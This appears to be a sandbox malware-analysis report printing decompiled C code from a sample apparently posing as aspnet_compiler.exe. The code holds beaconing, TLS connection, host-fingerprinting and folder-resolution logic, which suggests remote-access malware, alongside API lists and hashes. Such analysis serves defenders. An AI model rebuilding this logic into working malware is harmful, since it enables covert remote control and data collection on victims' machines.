                				E00401FC2(0x47351c, _t191, _t753, E00402EF0(_t415,  &_v40, E00406292( &_v64, E00401E45( &_v16, _t679, _t760, _t787, 0), _t760, 0x46a634), _t760, _t787, _t189));
                				E00401FB8();
                				E00401FB8();
                				E00401E45( &_v16, _t191, _t760, _t787, 2);
                				_t682 = "0";
                				_t197 = E00405AE5("0");
                				_t443 =  &_v100;
                				_t788 = _t197;
                				if(_t197 == 0) {
                					 *0x470ae4 = 1;
                					_push("TLS On ");
                				} else {
                					 *0x470ae4 = 0;
                					_push("TLS Off");
                				}
                				L00405A86(_t415, _t443, _t682);
                				_t768 = _t767 - 0x18;
                				E00402EF0(_t415, _t768, E00408832(_t415,  &_v40, E004052FE( &_v64, "Connecting  | ", _t760,  &_v100), _t749, _t760, _t788, " | "), _t760, _t788, 0x47351c);
                				_t769 = _t768 - 0x14;
                				E00402073(_t415, _t769, _t201, _t760, "i");
                				E0041A04A(_t415, _t749);
                				_t764 = _t769 + 0x30;
                				E00401FB8();
                				E00401FB8();
                				_t208 = E00401F8B(E00401E45( &_v16, _t201, _t760, _t788, 1));
                				_t210 = E00401F8B(E00401E45( &_v16, _t201, _t760, _t788, 0));
                				_t679 = _t208;
                				_t211 = E00414230(_t210, _t208,  &_v64,  &_v64);
                				_t789 = _t211;
                				if(_t211 == 0) {
                					_t753 = 0x4734e8;
                					_t212 = E0040480D(0x4734e8);
                					__eflags = _t212;
                					if(_t212 != 0) {
                						E00404F31(0x4734e8, 0x3c, 0); // executed
                						_t214 = E004048A8(0x4734e8, 0x4734e8, 0x4734e8); // executed
                						__eflags = _t214;
                						if(__eflags != 0) {
                							_t222 = E00401E45( &_v16, _t679, _t760, __eflags, 1);
                							_t770 = _t764 - 0x18;
                							_t223 = E00401E45( &_v16, _t679, _t760, __eflags, 0);
                							_t690 = E00408832(_t415,  &_v124, E00402EF0(_t415,  &_v208, E00408832(_t415,  &_v232, E004052FE( &_v256, "Connected   | ", _t760,  &_v100), _t749, _t760, __eflags, " | "), _t760, __eflags, _t223), _t749, _t760, __eflags, 0x46a634);
                							E00402EF0(_t415, _t770, _t690, _t760, __eflags, _t222);
                							_t771 = _t770 - 0x14;
                							E00402073(_t415, _t771, _t690, _t760, "i");
                							E0041A04A(_t415, _t749);
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							_v160 = 0;
                							asm("stosd");
                							asm("stosd");
                							asm("stosd");
                							asm("stosd");
                							asm("stosd");
                							_t237 = E0041A33B( &_v256);
                							_push(_t690);
                							E00413904( &_v160, "%I64u", _t237);
                							E004086D0(_t415,  &_v40, _t690, __eflags, 0x4730a0);
                							E00440751( &_v40,  *0x46f9d0,  &_v136, 0xa);
                							E004020D6(_t415,  &_v184, _t690, __eflags, E00401E45(0x473298, _t690, _t760, __eflags, 1));
                							_t245 = E0040245C();
                							_t246 = E00401F8B(0x473280);
                							_t487 = 0x473238;
                							_t691 = E00401F8B(0x473238);
                							_t249 = E004129E0(_t248, "name",  &_v2580, 0x104, _t246, _t245);
                							_t775 = _t771 + 0x60;
                							__eflags = _t249;
                							if(_t249 != 0) {
                								_t487 =  &_v184;
                								L00405A86(_t415, _t487, _t691,  &_v2580);
                							}
                							_push(_t487);
                							E0041288E( &_v64, 0x80000001, E00401F8B(0x473238), "hlight");
                							_t252 =  *0x470d58; // 0x0
                							_t776 = _t775 + 0xc;
                							_t751 = 0;
                							__eflags = _t252;
                							if(__eflags != 0) {
                								_t751 =  *_t252() & 0x0000ffff;
                							}
                							E0040415E(_t415,  &_v124, 0x80000001, _t760, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe");
                							_t255 = E0041A79D( &_v1552, E0040D28D(__eflags));
                							_t777 = _t776 - 0x18;
                							_t258 = E0041A879(_t415,  &_v1528, 0x473220);
                							_t259 = E0041A6E9(_t415,  &_v1504, _t751 & 0x0000ffff);
                							_t260 = E00401E45( &_v16, _t751 & 0x0000ffff, _t760, __eflags, 0);
                							_t263 = E0041A6E9(_t415,  &_v1480, GetTickCount());
                							_t265 = E0041A6E9(_t415,  &_v1456, E0041A641( &_v1480));
                							_t268 = E0041A879(_t415,  &_v1408, E0041A5F1(_t415,  &_v1432, 0x472ec8));
                							_t269 = E0041A879(_t415,  &_v1384, 0x472d40);
                							_t270 = E0041A879(_t415,  &_v1360,  &_v124);
                							_t271 = E0041A879(_t415,  &_v1336,  &_v40);
                							_t273 = E0041A879(_t415,  &_v1312, 0x473618);
                							_t274 = E0040EE14( &_v1288);
                							_t275 = E0041A879(_t415,  &_v1264, 0x4732a4);
                							_t679 = E00402EF0(_t415,  &_v256, E00402EF0(_t415,  &_v232, E00402EF0(_t415,  &_v208, E00402EF0(_t415,  &_v304, E00402EF0(_t415,  &_v328, E00402EF0(_t415,  &_v352, E00402EF0(_t415,  &_v376, E00402E81( &_v400, E00402EF0(_t415,  &_v424, E00402E81( &_v448, E00402EF0(_t415,  &_v472, E00402EF0(_t415,  &_v496, E00402EF0(_t415,  &_v520, E00402EF0(_t415,  &_v544, E00402EF0(_t415,  &_v568, E00408832(_t415,  &_v592, E00402EF0(_t415,  &_v616, E00402E81( &_v640, E00402EF0(_t415,  &_v664, E00402E81( &_v688, E00402EF0(_t415,  &_v712, E00408853(_t415,  &_v736, E00402EF0(_t415,  &_v760, E00402E81( &_v784, E00402EF0(_t415,  &_v808, E00402E81( &_v832, E00402EF0(_t415,  &_v856, E00402E81( &_v880, E00402EF0(_t415,  &_v904, E00402E81( &_v928, E00402EF0(_t415,  &_v952, E00408832(_t415,  &_v976, E00402EF0(_t415,  &_v1000, E00408832(_t415,  &_v1024, E00402EF0(_t415,  &_v1048, E00402E81( &_v1072, E00402EF0(_t415,  &_v1096, E00402EF0(_t415,  &_v1120, E00402EF0(_t415,  &_v1144, E00402E81( &_v1168, E00402EF0(_t415,  &_v1192, E00402E81( &_v1216, E00402F11( &_v1240,  &_v184, _t760, 0x472ec8), _t275), _t760, __eflags, 0x472ec8), _t274), _t760, __eflags, 0x472ec8), _t760, __eflags, 0x473950), _t760, __eflags, 0x472ec8), _t273), _t760, __eflags, 0x472ec8), 0x472ec8, _t760, __eflags,  &_v160), _t760, __eflags, 0x472ec8), 0x472ec8, _t760, __eflags, "4.6.0 Pro"), _t760, __eflags, 0x472ec8), _t271), _t760, __eflags, 0x472ec8), _t270), _t760, __eflags, 0x472ec8), _t269), _t760, __eflags, 0x472ec8), _t268), _t760, __eflags, 0x472ec8), 0x472ec8, _t760, __eflags,  *0x46f9d4 & 0x000000ff), _t760, __eflags, 0x472ec8), _t265), _t760, __eflags, 0x472ec8), _t263), _t760, __eflags, 0x472ec8), 0x472ec8, _t760, __eflags,  &_v136), _t760, __eflags, 0x472ec8), _t760, __eflags, _t260), _t760, __eflags, 0x472ec8), _t760, __eflags, 0x473268), _t760, __eflags, 0x472ec8), _t259), _t760, __eflags, 0x472ec8), _t258), _t760, __eflags, 0x472ec8), _t760, __eflags,  &_v280), _t760, __eflags, 0x472ec8), 
_t760, __eflags, 0x4732d4), _t760, __eflags, 0x472ec8), _t760, __eflags,  &_v64), _t760, __eflags, 0x472ec8);
                							E00402E81(_t777, _t318, _t255);
                							_t753 = 0x4734e8;
                							_push(0x4b);
                							E00404A81(0x4734e8, _t318, __eflags);
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401EE9();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401EE9();
                							E00404BF0(0x4734e8, _t318, E00414E1C, 1);
                							_t379 =  *0x470d5c; // 0x0
                							__eflags = _t379;
                							if(_t379 != 0) {
                								__eflags =  *0x470d4a;
                								if( *0x470d4a != 0) {
                									_t379 =  *_t379();
                									 *0x470d4a = 0;
                								}
                							}
                							__eflags =  *0x47308a;
                							if( *0x47308a != 0) {
                								_t379 = E0040A5C4(_t415, 0x473040, _t679);
                							}
                							E00405A4B(_t379);
                							_t778 = _t777 - 0x18;
                							E00402073(_t415, _t778, _t679, _t760, "Disconnected");
                							_t779 = _t778 - 0x18;
                							E00402073(_t415, _t779, _t679, _t760, "!");
                							E0041A04A(_t415, 0x472ec8);
                							_t764 = _t779 + 0x30;
                							__eflags =  *0x472acb;
                							if( *0x472acb != 0) {
                								__eflags = 0;
                								CreateThread(0, 0, E00419872, 0, 0, 0);
                							}
                							E00401FB8();
                							E00401FB8();
                							E00401EE9();
                							_t749 = 0x473298;
                						}
                					} else {
                						_t780 = _t764 - 0x18;
                						E00402073(_t415, _t780, _t679, _t760, "Connection Error: Unable to create socket");
                						_t781 = _t780 - 0x18;
                						E00402073(_t415, _t781, _t679, _t760, "E");
                						E0041A04A(_t415, _t749);
                						_t764 = _t781 + 0x30;
                					}
                				} else {
                					__imp__#111();
                					_t395 = E0041B45A( &_v40, _t211);
                					_t782 = _t764 - 0x18;
                					_t679 = "Connection Error: ";
                					E004052DD(_t415, _t782, "Connection Error: ", _t760, _t789, _t395);
                					_t783 = _t782 - 0x14;
                					E00402073(_t415, _t783, "Connection Error: ", _t760, "E");
                					E0041A04A(_t415, _t749);
                					_t764 = _t783 + 0x30;
                					E00401FB8();
                					_t753 = 0x4734e8;
                				}
                				E00404E06(_t679);
                				_t415 =  &(_t415->nLength);
                				_t216 = E004021DA( &_v76);
                				_t790 = _t415 - _t216;
                				if(_t415 >= _t216) {
                					_t415 = 0;
                					_t221 = E0043A3AC(_t218, E00401F8B(E00401E45(_t749, _t679, _t760, _t790, 2))) * 0x3e8;
                					_t787 = _t221;
                					Sleep(_t221); // executed
                				}
                				E00401E6D( &_v16, _t679);
                				goto L4;
                			}
                0x00414c60
                0x00414c6b
                0x00414c76
                0x00414c81
                0x00414c8c
                0x00414c97
                0x00414ca2
                0x00414cad
                0x00414cb8
                0x00414cc3
                0x00414cce
                0x00414cd9
                0x00414ce4
                0x00414cef
                0x00414cfa
                0x00414d05
                0x00414d10
                0x00414d1b
                0x00414d26
                0x00414d2e
                0x00414d3c
                0x00414d41
                0x00414d46
                0x00414d48
                0x00414d4a
                0x00414d51
                0x00414d53
                0x00414d55
                0x00414d55
                0x00414d51
                0x00414d5c
                0x00414d63
                0x00414d6a
                0x00414d6a
                0x00414d6f
                0x00414d74
                0x00414d7e
                0x00414d83
                0x00414d8d
                0x00414d92
                0x00414d97
                0x00414d9a
                0x00414da1
                0x00414da3
                0x00414daf
                0x00414daf
                0x00414db8
                0x00414dc3
                0x00414dcb
                0x00414dd0
                0x00414dd0
                0x0041452c
                0x0041452c
                0x00414536
                0x0041453b
                0x00414545
                0x0041454a
                0x0041454f
                0x0041454f
                0x004144d3
                0x004144d3
                0x004144de
                0x004144e3
                0x004144e6
                0x004144ee
                0x004144f3
                0x004144fd
                0x00414502
                0x00414507
                0x0041450d
                0x00414512
                0x00414512
                0x00414dd7
                0x00414ddf
                0x00414de0
                0x00414de5
                0x00414de7
                0x00414ded
                0x00414e01
                0x00414e01
                0x00414e09
                0x00414e09
                0x00414e12
                0x00000000

                APIs
                • Sleep.KERNEL32(00000000,00000029,00473238,00473298,00000000), ref: 004142C2
                • WSAGetLastError.WS2_32(00000000,00000001), ref: 004144D3
                • Sleep.KERNELBASE(00000000,00000002), ref: 00414E09
                  • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Sleep$ErrorLastLocalTime
                • String ID: 2G$ | $%I64u$4.6.0 Pro$82G$@-G$@0G$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $hlight$name$4G$4G$4G$Cqt
                • API String ID: 524882891-3434259954
                • Opcode ID: cda3c33907060bd797f23cb1446595010d75ab10fdd55e45392da1c90188f4b9
                • Instruction ID: ab0e32b11b9d89d3eba901e54de1f942eff96493c18d1503d8c82c51ace3a389
                • Opcode Fuzzy Hash: cda3c33907060bd797f23cb1446595010d75ab10fdd55e45392da1c90188f4b9
                • Instruction Fuzzy Hash: 52529D31A001155BCB18F761DD96AEEB3699F90308F1041BFF40A761E2EF785F868A9D
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 72%
                			E004048A8(void* __ecx, void* __esi) {
                				char _v32;
                				void* __ebx;
                				void* __edi;
                				void* __ebp;
                				intOrPtr _t21;
                				int _t22;
                				void* _t26;
                				signed int _t31;
                				void* _t32;
                				void* _t33;
                				struct _SECURITY_ATTRIBUTES* _t34;
                				void* _t43;
                				void* _t51;
                				struct _SECURITY_ATTRIBUTES* _t56;
                				void* _t58;
                				void* _t81;
                				void* _t82;
                				void* _t84;
                				void* _t85;
                				void* _t86;
                				void* _t87;
                				void* _t103;
                				void* _t104;
                
                				_t84 = __esi;
                				_t21 =  *0x470adc; // 0x140f348
                				_t87 = _t86 - 0x1c;
                				_t82 = __ecx;
                				__imp__#4( *((intOrPtr*)(__ecx + 4)),  *((intOrPtr*)(_t21 + 0x18)),  *((intOrPtr*)(_t21 + 0x10)), _t81, _t51); // executed
                				if(_t21 != 0) {
                					__eflags =  *((char*)(__ecx + 0x31));
                					if( *((char*)(__ecx + 0x31)) != 0) {
                						__imp__#111();
                						_t56 = _t21 - 0x2736;
                						__eflags = _t56;
                						if(_t56 != 0) {
                							__eflags = _t56 == 0x17;
                							if(_t56 == 0x17) {
                								_t88 = _t87 - 0x18;
                								_t58 = _t87 - 0x18;
                								_push("Connection Refused");
                								goto L20;
                							} else {
                								_t26 = E0041B45A( &_v32, _t21);
                								_t91 = _t87 - 0x18;
                								E004052DD(_t51, _t87 - 0x18, "Connection Failed: ", _t85, __eflags, _t26);
                								E00402073(_t51, _t91 - 0x14, "Connection Failed: ", _t85, "E");
                								E0041A04A(_t51, _t82);
                								E00401FB8();
                							}
                						}
                					}
                					goto L21;
                				} else {
                					if( *((intOrPtr*)(__ecx + 1)) == _t21) {
                						L14:
                						_t22 = 1;
                					} else {
                						if( *((intOrPtr*)(__ecx + 0x31)) != _t21) {
                							_t103 = _t87 - 0x18;
                							_t6 = _t82 + 0x34; // 0x472f14
                							_t77 = "TLS Handshake...      | ";
                							E004052FE(_t103, "TLS Handshake...      | ", _t85, _t6);
                							_t104 = _t103 - 0x14;
                							E00402073(_t51, _t104, "TLS Handshake...      | ", _t85, "i");
                							E0041A04A(_t51, _t82);
                							_t87 = _t104 + 0x30;
                						}
                						_t31 = E0041F56B(_t51);
                						 *(_t82 + 0x4c) = _t31;
                						if(_t31 != 0) {
                							_t80 =  *((intOrPtr*)(_t82 + 4));
                							_t32 = E0041F79A(_t31,  *((intOrPtr*)(_t82 + 4)));
                							__eflags = _t32 - 1;
                							if(_t32 == 1) {
                								_t33 = E0042034B();
                								__eflags = _t33 - 1;
                								if(_t33 == 1) {
                									_t34 = E0041F711(_t51);
                									 *((intOrPtr*)(_t82 + 0x50)) = _t34;
                									__eflags = _t34;
                									if(_t34 == 0) {
                										_t94 = _t87 - 0x18;
                										E00402073(_t51, _t87 - 0x18, _t80, _t85, "TLS Error 3");
                										E00402073(_t51, _t94 - 0x18, _t80, _t85, "E");
                										E0041A04A(_t51, _t82);
                									}
                									__eflags = 0;
                									 *((intOrPtr*)(_t82 + 0x70)) = CreateEventW(0, 0, 1, 0);
                									 *((intOrPtr*)(_t82 + 0x6c)) = CreateEventW(0, 0, 1, 0);
                									goto L14;
                								} else {
                									_t97 = _t87 - 0x18;
                									E00402073(_t51, _t87 - 0x18, _t80, _t85, "TLS Authentication Failed");
                									E00402073(_t51, _t97 - 0x18, _t80, _t85, "E");
                									_t43 = E0041F9BD(E0041A04A(_t51, _t82),  *(_t82 + 0x4c));
                									goto L8;
                								}
                							} else {
                								_t100 = _t87 - 0x18;
                								E00402073(_t51, _t87 - 0x18, _t80, _t85, "TLS Error 2");
                								E00402073(_t51, _t100 - 0x18, _t80, _t85, "E");
                								_t43 = E0041A04A(_t51, _t82);
                								L8:
                								E0041F5AB(_t43, _t51,  *(_t82 + 0x4c), _t80, _t82, _t84);
                								 *(_t82 + 0x4c) =  *(_t82 + 0x4c) & 0x00000000;
                								goto L21;
                							}
                						} else {
                							_t88 = _t87 - 0x18;
                							_t58 = _t87 - 0x18;
                							_push("TLS Error 1");
                							L20:
                							E00402073(_t51, _t58, _t77, _t85);
                							E00402073(_t51, _t88 - 0x18, _t77, _t85, "E");
                							E0041A04A(_t51, _t82);
                							L21:
                							_t22 = 0;
                						}
                					}
                				}
                				return _t22;
                			}


                APIs
                • connect.WS2_32(?,?,?), ref: 004048C0
                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
                • WSAGetLastError.WS2_32 ref: 00404A01
                  • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                • API String ID: 994465650-2151626615
                • Opcode ID: 13303b7777a66e0627b8120b2b748ce865bb03d248de62a457749d618faae74e
                • Instruction ID: 4dac077a67aca900205559ee8606d27a3048533bf49cbaad300c4d8012786ffc
                • Opcode Fuzzy Hash: 13303b7777a66e0627b8120b2b748ce865bb03d248de62a457749d618faae74e
                • Instruction Fuzzy Hash: 5641C5B1F4020177D6047B7A890B96E7A25AB81304B50017FF901226D3EE7DA96587EF
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 92%
                			E00404E06(void* __edx) {
                				void* __ebx;
                				void* __ecx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				long _t29;
                				int _t32;
                				void* _t44;
                				void* _t48;
                				void* _t50;
                				void* _t51;
                
                				_t48 = __edx;
                				_t51 = WaitForSingleObject;
                				_t50 = _t44;
                				_t29 = WaitForSingleObject( *(_t50 + 0x68), 0xffffffff);
                				if( *(_t50 + 4) != 0xffffffff) {
                					__imp__#3( *(_t50 + 4));
                					if(_t29 == 0) {
                						 *(_t50 + 4) =  *(_t50 + 4) | 0xffffffff;
                					}
                					_t45 = _t50;
                					if(E004046D3(_t50) != 0) {
                						E004050C4(_t45, _t51, 1);
                					}
                					if( *((char*)(_t50 + 1)) != 0) {
                						E0041F5AB(WaitForSingleObject( *(_t50 + 0x70), 0xffffffff), CloseHandle,  *(_t50 + 0x50), _t48, SetEvent, _t50);
                						 *(_t50 + 0x50) =  *(_t50 + 0x50) & 0x00000000;
                						SetEvent( *(_t50 + 0x70));
                						E0041F5AB(WaitForSingleObject( *(_t50 + 0x6c), 0xffffffff), CloseHandle,  *(_t50 + 0x4c), _t48, SetEvent, _t50);
                						 *(_t50 + 0x4c) =  *(_t50 + 0x4c) & 0x00000000;
                						SetEvent( *(_t50 + 0x6c));
                						FindCloseChangeNotification( *(_t50 + 0x70)); // executed
                						FindCloseChangeNotification( *(_t50 + 0x6c)); // executed
                						 *(_t50 + 0x70) =  *(_t50 + 0x70) & 0x00000000;
                						 *(_t50 + 0x6c) =  *(_t50 + 0x6c) & 0x00000000;
                					}
                					SetEvent( *(_t50 + 0x68));
                					_t32 = CloseHandle( *(_t50 + 0x68));
                				} else {
                					SetEvent( *(_t50 + 0x68));
                					_t32 = CloseHandle( *(_t50 + 0x68));
                				}
                				 *(_t50 + 0x68) =  *(_t50 + 0x68) & 0x00000000;
                				return _t32;
                			}


                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E18
                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E23
                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E2C
                • closesocket.WS2_32(000000FF), ref: 00404E3A
                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E71
                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404E82
                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E89
                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E9A
                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E9F
                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EA4
                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404EB1
                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404EB6
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseEvent$ObjectSingleWait$ChangeFindHandleNotification$closesocket
                • String ID:
                • API String ID: 4074944092-0
                • Opcode ID: c35fc44e5bfacc15a099201c4a6197d0eccb1db68525e6f951916da880a66cf1
                • Instruction ID: 36cdbf8d69702b382ce25e6a3e5e0fa9723ae9905729ab2d5c1a42a88e4aa4cf
                • Opcode Fuzzy Hash: c35fc44e5bfacc15a099201c4a6197d0eccb1db68525e6f951916da880a66cf1
                • Instruction Fuzzy Hash: D6211A71044B00AFD7216B26DC49A1BBBA6FF40326F104A3DE1A611AF1CB75A851DB98
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 86%
                			E0040CF38(void* __ecx, void* __edx, intOrPtr _a4) {
                				char _v524;
                				char _v544;
                				char _v560;
                				char _v572;
                				void* _v576;
                				char _v580;
                				char _v584;
                				char _v600;
                				char _v608;
                				char _v616;
                				char _v620;
                				void* _v624;
                				char _v628;
                				char _v632;
                				char _v636;
                				char _v644;
                				void* _v648;
                				char _v652;
                				void* _v672;
                				void* __ebx;
                				void* __ebp;
                				signed int _t36;
                				void* _t39;
                				void* _t40;
                				void* _t77;
                				void* _t82;
                
                				_t73 = __edx;
                				_t77 = __ecx;
                				_t54 = __edx;
                				E00401F66(__edx,  &_v644);
                				_t36 = __edx + 0xffffffd0;
                				_t86 = _t36 - 8;
                				if(_t36 <= 8) {
                					switch( *((intOrPtr*)(_t36 * 4 +  &M0040D120))) {
                						case 0:
                							_push(L"Temp");
                							goto L15;
                						case 1:
                							__ecx =  &_v620;
                							__eax = E0041A10F(__ebx,  &_v620, __edx);
                							__ecx =  &_v644;
                							__eax = E00401EF3( &_v644, __edx, __esi, __eax);
                							goto L4;
                						case 2:
                							_push(L"SystemDrive");
                							goto L15;
                						case 3:
                							_push(L"WinDir");
                							goto L15;
                						case 4:
                							__eax = E0041AB12(__ecx);
                							__eflags = __al;
                							if(__eflags != 0) {
                								__ecx =  &_v620;
                								E0040415E(__ebx, __ecx, __edx, __ebp, L"\\SysWOW64") = E0043A99F(__ebx, __ecx, __eflags, L"WinDir");
                								__ecx =  &_v600;
                								__edx = __eax;
                								__ecx =  &_v580;
                								__eax = E00402F85( &_v580, __edx, __eax);
                								__ecx =  &_v652;
                								__eax = E00401EF3( &_v652, __edx, __esi, __eax);
                								__ecx =  &_v584;
                								__eax = E00401EE9();
                								__ecx =  &_v608;
                								__eax = E00401EE9();
                								L4:
                								__ecx =  &_v620;
                								goto L5;
                							} else {
                								__ecx =  &_v572;
                								E0040415E(__ebx, __ecx, __edx, __ebp, L"\\system32") = E0043A99F(__ebx, __ecx, __eflags, L"WinDir");
                								__ecx =  &_v600;
                								__edx = __eax;
                								__ecx =  &_v628;
                								__eax = E00402F85( &_v628, __edx, __eax);
                								__ecx =  &_v652;
                								__eax = E00401EF3( &_v652, __edx, __esi, __eax);
                								__ecx =  &_v632;
                								__eax = E00401EE9();
                								__ecx =  &_v608;
                								__eax = E00401EE9();
                								__ecx =  &_v584;
                								L5:
                								__eax = E00401EE9();
                								goto L17;
                							}
                							L18:
                						case 5:
                							L14:
                							_push(L"ProgramFiles");
                							goto L15;
                						case 6:
                							_push(L"AppData");
                							goto L15;
                						case 7:
                							_push(L"UserProfile");
                							L15:
                							_t51 = E0043A99F(_t54, _t57, _t86);
                							goto L16;
                						case 8:
                							__eax = E0043A99F(__ebx, __ecx, __eflags, L"ProgramData"); // executed
                							__eflags = __eax;
                							if(__eflags == 0) {
                								goto L14;
                							}
                							L16:
                							L004086CB(_t54,  &_v644, _t73, _t51);
                							goto L17;
                					}
                				}
                				L17:
                				__imp__GetLongPathNameW(E00401EE4( &_v644),  &_v524, 0x208); // executed
                				_t39 = E0040415E(_t54,  &_v560, _t73, _t82, _a4);
                				_t40 = E0040415E(_t54,  &_v636, _t73, _t82, "\\");
                				E00402F85(_t77, E00402F85( &_v600, E0040D2D5(_t54,  &_v616, _t73, _t82, _t86,  &_v544, _t38), _t40), _t39);
                				E00401EE9();
                				E00401EE9();
                				E00401EE9();
                				E00401EE9();
                				E00401EE9();
                				return _t77;
                				goto L18;
                			}


                APIs
                • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040D09E
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: LongNamePath
                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                • API String ID: 82841172-425784914
                • Opcode ID: 416c82e29f2a5aaddd2cac1b05b639a7fd3b3722419c04575c1af6e40ff1a376
                • Instruction ID: 6b614a152261b5ac042ce2f1e9ed8ca0f13a8186c1863ac34b2aa9a3c23cc976
                • Opcode Fuzzy Hash: 416c82e29f2a5aaddd2cac1b05b639a7fd3b3722419c04575c1af6e40ff1a376
                • Instruction Fuzzy Hash: A24155715082009AC204F761D852DAFB3E8AE9075CF10053FF586760E2EE789A4AC65F
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 74%
                			E00419E1E(void* __ecx, void* __eflags) {
                				char _v28;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				char _t7;
                				void* _t8;
                				int _t15;
                				void* _t25;
                				void* _t31;
                				void* _t32;
                				void* _t33;
                
                				_t7 = E0041AB12(__ecx);
                				_push(__ecx);
                				_t19 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion";
                				 *0x472ae4 = _t7;
                				_t29 = 0x80000002;
                				_t8 = E0041288E( &_v28, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName"); // executed
                				E00401FC2(0x473950, 0x80000002, _t31, _t8);
                				E00401FB8();
                				_t32 = E00406155(0x473950, "10", 0);
                				if(_t32 != 0xffffffff) {
                					_push(0x473950);
                					_t29 = 0x80000002;
                					E0041288E( &_v28, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "CurrentBuildNumber"); // executed
                					_t15 = StrToIntA(E00401F8B( &_v28));
                					_t39 = _t15 - 0x55f0;
                					if(_t15 >= 0x55f0) {
                						_t5 = _t32 + 1; // 0x1
                						 *((char*)(E0041B874(0x80000002, _t33, _t39, _t5))) = 0x31;
                					}
                					E00401FB8();
                				}
                				_t25 = 0x473950;
                				if( *0x472ae4 == 0) {
                					_push(" (32 bit)");
                				} else {
                					_push(" (64 bit)");
                				}
                				return L0040535D(_t19, _t25, _t29, 0x473950, _t33);
                			}
















                APIs
                  • Part of subcall function 0041AB12: GetCurrentProcess.KERNEL32(?,?,?,0040CFAE,WinDir,00000000,00000000), ref: 0041AB23
                  • Part of subcall function 0041288E: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004128B2
                  • Part of subcall function 0041288E: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004128CF
